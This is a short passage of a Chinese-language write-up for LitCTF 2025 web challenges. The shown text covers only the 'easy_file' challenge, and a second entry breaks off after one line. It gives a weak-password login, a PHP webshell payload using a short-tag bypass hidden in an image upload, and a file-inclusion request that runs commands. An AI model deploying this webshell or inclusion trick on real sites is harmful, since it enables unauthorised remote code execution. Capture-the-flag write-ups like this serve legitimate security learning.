【2025】LitCTF
# Web
# [LitCTF 2025]easy_file
登录框弱密码爆破为 admin:password,之后跳转到文件上传点,只能上传头像,并且 php 被过滤,短标签绕过:
1<?= system($_REQUEST['cmd']);?>
js 里面存在提示,说 file 查看头像,估计是可以文件包含。直接传:
1/admin.php?file=uploads/a.jpg&cmd=tac f*
进行 rce。
# [LitCTF 2025]nest_js
登录框弱密码爆破还是...
more...









